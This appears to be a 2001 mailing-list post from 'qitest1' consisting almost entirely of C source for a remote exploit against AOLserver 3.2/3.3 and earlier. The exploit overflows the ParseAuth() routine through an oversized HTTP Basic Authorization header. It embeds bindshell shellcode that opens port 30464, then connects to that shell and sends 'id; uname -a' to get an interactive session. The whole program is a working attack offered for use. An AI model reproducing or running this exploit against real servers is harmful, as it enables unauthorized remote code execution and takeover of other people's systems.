hi AOLserver exploit code attached, read the code for further info. bye -- /* qitest1 - http://www.digit-labs.org/qitest1 * * ``Ut tensio, sic vis. 69 tecum sis.'' * * main(){if(unsatisfied == 69) try_come(in);} */
/* * AOLserver version 3.2 and prior Linux x86 remote exploit * by qitest1 - Wed Sep 5 17:20:10 CEST 2001 * * Proof of concept code for exploiting the bof in ParseAuth(). I * used this vuln as a playground for some tests, all done on a RH6.2 * box. The fp will be overwritten by a pointer to a fake frame, with * an fp and an eip pointing to the shellcode. Very unstable, segfault * in most cases. * * Greets: grazer and the other hot guys on #!digit-labs * teleh0r: come back home fratello! =) * * ..harder times for 0x69, now at http://digit-labs.org/qitest1.. */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #include <netdb.h> #define EIP_POS 260 #define SC_ADDR 0xbf1ff9a8 #define FP 0xbf1ff9a0 #define FAKE_FP 0xbf1ffaf4 char shellcode[] = /* Taeho Oh bindshell code at port 30464 */ "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0" "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06" "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89" "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31" "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80" "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04" "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd" "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80" "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f" "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31" "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff"; int sockami(char *host, int port); void shellami(int sock); void zbuffami(u_long fp, u_long sc_addr, char *zbuf); int Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded); int main(int argc, char **argv) { int sock; char zbuf[1024], ubuf[1024], sbuf[1024]; printf("\n AOLserver version 3.3 and prior exploit by qitest1\n\n"); if(argc == 1) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(1); } printf("+Connecting to %s...\n", argv[1]); sock = sockami(argv[1], 80); printf(" connected\n"); printf("+Building buffer with shellcode len: %d...\n", strlen(shellcode)); memset(zbuf, 0x00, sizeof(zbuf)); zbuffami(FP, SC_ADDR, zbuf); printf(" done\n"); printf("+Encoding buffer...\n"); memset(ubuf, 0x00, sizeof(ubuf)); Ns_HtuuEncode(zbuf, strlen(zbuf), ubuf); printf(" done\n"); printf("+Making http request...\n"); sprintf(sbuf, "GET / HTTP/1.0\nAuthorization: Basic %s\r\n\r\n", ubuf); send(sock, sbuf, strlen(sbuf), 0); printf(" done\n"); printf("+Waiting for the shellcode to be executed...\n 0x69\n"); sleep(2); sock = sockami(argv[1], 30464); shellami(sock); } int sockami(char *host, int port) { struct sockaddr_in address; struct hostent *hp; int sock; sock = socket(AF_INET, SOCK_STREAM, 0); if(sock == -1) { perror("socket()"); exit(-1); } hp = gethostbyname(host); if(hp == NULL) { perror("gethostbyname()"); exit(-1); } memset(&address, 0, sizeof(address)); memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length); address.sin_family = AF_INET; address.sin_port = htons(port); if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1) { perror("connect()"); exit(-1); } return(sock); } void shellami(int sock) { int n; char recvbuf[1024], *cmd = "id; uname -a\n"; fd_set rset; send(sock, cmd, strlen(cmd), 0); while (1) { FD_ZERO(&rset); FD_SET(sock, &rset); FD_SET(STDIN_FILENO, &rset); select(sock+1, &rset, NULL, NULL, NULL); if(FD_ISSET(sock, &rset)) { n = read(sock, recvbuf, 1024); if (n <= 0) { printf("Connection closed by foreign host.\n"); exit(0); } recvbuf[n] = 0; printf("%s", recvbuf); } if (FD_ISSET(STDIN_FILENO, &rset)) { n = read(STDIN_FILENO, recvbuf, 1024); if (n > 0) { recvbuf[n] = 0; write(sock, recvbuf, n); } } } return; } void zbuffami(u_long fp, u_long sc_addr, char *zbuf) { int i, n = 0; for(i = 0; i < EIP_POS; i++) zbuf[i] = 0x90; /* Fake frame... */ zbuf[0] = (u_char) (FAKE_FP & 0x000000ff); zbuf[1] = (u_char)((FAKE_FP & 0x0000ff00) >> 8); zbuf[2] = (u_char)((FAKE_FP & 0x00ff0000) >> 16); zbuf[3] = (u_char)((FAKE_FP & 0xff000000) >> 24); zbuf[4] = (u_char) (sc_addr & 0x000000ff); zbuf[5] = (u_char)((sc_addr & 0x0000ff00) >> 8); zbuf[6] = (u_char)((sc_addr & 0x00ff0000) >> 16); zbuf[7] = (u_char)((sc_addr & 0xff000000) >> 24); for(i = EIP_POS - 4 - strlen(shellcode) - 8; i < EIP_POS - 4 - 8; i++) zbuf[i] = shellcode[n++]; /* Padding... */ for(n = 0; n < 8 ; n++) zbuf[i++] = 0x69; zbuf[EIP_POS - 4] = (u_char) (fp & 0x000000ff); zbuf[EIP_POS - 3] = (u_char)((fp & 0x0000ff00) >> 8); zbuf[EIP_POS - 2] = (u_char)((fp & 0x00ff0000) >> 16); zbuf[EIP_POS - 1] = (u_char)((fp & 0xff000000) >> 24); zbuf[EIP_POS] = 0x00; /* Extra junk */ for(i = 0; i < 4; i++) strcat(zbuf, "\x69\x69\x69\x69"); return; } static char six2pr[64] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/' }; static unsigned char pr2six[256]; /* qitest1 and the pleasure of reading... ;pP * This routine converts a buffer of bytes to/from RFC 1113 * printable encoding format. * This technique is similar to the familiar Unix uuencode format * in that it maps 6 binary bits to one ASCII character (or more * aptly, 3 binary bytes to 4 ASCII characters). However, RFC 1113 * does not use the same mapping to printable characters as uuencode. * * Mark Riordan 12 August 1990 and 17 Feb 1991. * This code is hereby placed in the public domain. * * Encode a single line of binary data to a standard format that * uses only printing ASCII characters (but takes up 33% more bytes). */ int Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded) { #define ENC(c) six2pr[c] register char *outptr = bufcoded; unsigned int i; for (i = 0; i < nbytes; i += 3) { /* c1 */ *(outptr++) = ENC(*bufin >> 2); /* c2 */ *(outptr++) = ENC(((*bufin << 4) & 060) | ((bufin[1] >> 4) & 017)); /* c3 */ *(outptr++) = ENC(((bufin[1] << 2) & 074) | ((bufin[2] >> 6) & 03)); /* c4 */ *(outptr++) = ENC(bufin[2] & 077); bufin += 3; } /* * If nbytes was not a multiple of 3, then we have encoded too many * characters. Adjust appropriately. */ if (i == nbytes + 1) { /* There were only 2 bytes in that last group */ outptr[-1] = '='; } else if (i == nbytes + 2) { /* There was only 1 byte in that last group */ outptr[-1] = '='; outptr[-2] = '='; } *outptr = '\0'; return (outptr - bufcoded); }
